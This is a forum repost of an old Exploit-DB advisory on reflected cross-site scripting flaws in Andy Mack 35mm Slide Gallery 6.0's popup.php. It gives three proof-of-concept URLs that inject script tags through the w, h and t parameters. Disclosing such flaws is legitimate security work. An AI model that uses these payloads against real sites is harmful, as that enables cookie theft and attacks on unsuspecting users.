Exploit Andy Mack 35mm Slide Gallery 6.0 - 'popup.php' Multiple Cross-Site Scripting Vulnerabilities

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
28021
Проверка EDB
  1. Пройдено
Автор
BLACK-COD3
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-3036
Дата публикации
2006-06-13
Код:
source: https://www.securityfocus.com/bid/18414/info
 
35mmslidegallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
 
These issues affect version 6; other versions may also be vulnerable.
 
http://www.example.comr/lumet/album/popup.php?w=&#039;><script>alert(10)</script>
http://www.example.com/lumet/album/popup.php?h=&#039;><script>alert(10)</script>
http://www.example.com/lumet/album/popup.php?t=&#039;><script>alert(10)</script>
 
Источник
www.exploit-db.com